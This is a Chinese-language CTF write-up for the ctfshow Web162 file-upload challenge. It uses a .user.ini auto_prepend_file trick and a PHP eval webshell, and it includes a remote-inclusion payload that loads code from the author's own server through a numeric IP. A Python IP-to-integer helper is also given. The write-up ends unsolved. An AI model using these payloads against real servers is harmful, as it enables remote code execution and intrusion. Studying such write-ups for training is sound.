ctfshow(162)--文件上传漏洞--远程文件包含

Web162

进入界面:

思路

先传个文件测试一下过滤:
过滤了特别多符号,注意过滤了点.

我们的思路还是要先上传.user.ini文件:

php 复制代码
//修改前
GIF89a
auto_prepend_file=shell.png

//由于过滤了点,所以修改为
GIF89a
auto_prepend_file=shell

上传.user.ini文件

接下来就是上传包含一句话木马或恶意命令的shell文件。

因为过滤了点,所以我们之前的那些上传方法都不能使用。

这里学习一个新的上传方法:远程文件包含。

现在自己的服务器里写一个shell文件:

php 复制代码
<?php @eval($_POST[1]);?>

然后上传一个远程调用文件到目标靶机:

php 复制代码
GIF89a
<?=include"http://数字IP/shell"?>

这里的数字IP是指自己服务器的IP地址的纯数字形式.下面是相关脚本:

php 复制代码
#IP转换为长整型
def ip2long(ip):
    ip_list=ip.split('.') #⾸先先把ip的组成以'.'切割然后逐次转换成对应的⼆进制
    result = 0
    for i in range(4): #0,1,2,3
        result = result+int(ip_list[i])*256**(3-i)
    return result
 
#长整型转换为IP
def long2ip(long):
    floor_list = []
    num = long
    for i in reversed(range(4)):
        res = divmod(num,256**i)
        floor_list.append(str(res[0]))
        num = res[1]
    return '.'.join(floor_list)
 
print(ip2long('服务器ip地址'))

上传远程调用文件,后缀设置为.png,抓包修改文件名为shell,成功上传。访问/upload目录:
告警,大意是不允许包含外部网站的内容。

到这里卡住了,看了一些WP,说是要用flask。但是上述远程文件包含的思路是对的,使用flask的内容之后再补上。

相关推荐
Ancelin安心1 天前
FastJson反序列化和Shiro漏洞
java·运维·开发语言·安全·web安全·json·idea
ccino .2 天前
【Drupal文件上传导致跨站脚本执行(CVE-2019-6341)】
运维·网络安全·docker·容器
玄斎2 天前
手把手教你做eNSP动态路由实验
网络·网络协议·学习·网络安全·智能路由器·hcia·ospf
少云清2 天前
【安全测试】3_网络安全测试 _数据加密和数据签名
安全·web安全
独行soc2 天前
2026年渗透测试面试题总结-23(题目+回答)
网络·python·安全·web安全·渗透测试·安全狮
ccino .2 天前
【Spring Security RegexRequestMatcher 认证绕过漏洞(CVE-2022-22978)分析】
java·后端·spring·网络安全
Jerry_Gao9212 天前
【CTF】一道非常精彩的CTF题目之 SSRF + CRLF + Python反序列化组合漏洞利用
python·web安全·网络安全·ctf·ssrf·crlf
乾元2 天前
威胁狩猎: 基于自然语言的交互式威胁查询系统(ChatWithSecurity)
运维·网络·人工智能·网络协议·安全·网络安全·自动化
Whoami!2 天前
⓬⁄₂ ⟦ OSCP ⬖ 研记 ⟧ Linux权限提升 ➱ Linux系统枚举-II
linux·网络安全·信息安全·iptables
网安老伯2 天前
2026 网络安全就业:普通人抓住年薪百万入场券的实操指南
运维·python·学习·web安全·网络安全·职场和发展·php